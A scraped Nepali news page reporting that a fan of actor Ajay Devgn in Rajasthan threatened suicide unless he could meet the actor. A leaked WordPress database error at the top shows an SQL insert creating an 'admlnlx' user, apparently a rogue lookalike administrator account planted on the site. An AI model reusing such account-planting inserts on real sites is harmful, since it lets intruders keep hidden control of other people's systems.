WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BXc7LNdxeV6gUZjMM03zE.V//5aPTV/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 11:24:25', '', 'admlnlx', 'admlnlx')
माघ, ७ –
कलाकारका फ्यान थरीथरीका हुन्छन् । बलिउड अभिनेता अजय देवगणका एक फ्यानले हालै अनौठो चर्तिकला देखाएका छन् ।
जिल्ला प्रशासनसँग अजयलाई भेट्न पाउँ भन्ने माग राखेका राजस्थानका समसाद नामक एक फ्यानले इनारमा झुण्डिएर आत्महत्या गर्न खोजे । मानिसहरुले बल्लतल्ल उनलाई इनारबाट बाहिर निकाले । तर उनले अजयलाई भेट्न नपाए आत्महत्या गरेरै छाड्ने धम्कि दिइरहे । जिल्ला प्रशासनले उनलाई अजयसँग भेट गराइदिने बाचा गरेको छ ।
यो खबर सुनेपछि अजय पनि आफ्ना डाइ हार्ड फ्यानसँग भेट्न तयार भएका छन् । उनले आफ्नो ट्वीटर ह्यान्डलमा लेखे, ‘म सुटिङका लागि जोधपुर आउँदैछु, आशा छ त्यहीँ तिमीसँग मेरो भेट हुनेछ ।’
अजयलाई आफ्नो फ्यान क्लवमार्फत समसादको विजषयमा थाहा भएको थियो । समाचार अनुसार अजय २० जनवरीमा आफ्ना फ्यानलाई भेट्न राजस्थान जाँदैछन् । – एजेन्सी